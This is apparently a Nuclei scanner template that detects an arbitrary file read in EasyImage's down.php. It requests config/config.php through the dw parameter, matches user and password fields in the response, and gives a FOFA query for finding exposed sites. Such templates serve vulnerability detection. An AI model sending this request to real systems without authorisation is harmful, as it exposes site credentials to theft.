id: easyimage-downphp-lfi info: name: EasyImage down.php - Arbitrary File Read author: DhiyaneshDk severity: high reference: - https://github.com/qingchenhh/qc_poc/blob/main/Goby/EasyImage_down.php_file_read.go metadata: verified: true max-request: 1 fofa-query: app="EasyImage-简单图床" tags: easyimage,lfi,exposure,config http: - method: GET path: - "{{BaseURL}}/application/down.php?dw=config/config.php" matchers-condition: and matchers: - type: word part: body words: - "'user'=>" - "'password'=>" - "EasyImage" condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 4a0a004730450220378fc292488239c8b9f2a595aa22e8aacefca6730b2bbb01603278e0c678aee90221008ede017c9f45d2ccff4832209ef063804c7eb0b44794e8771b3ac65795ebc4ca:922c64590222798bb761d5b6d8e72950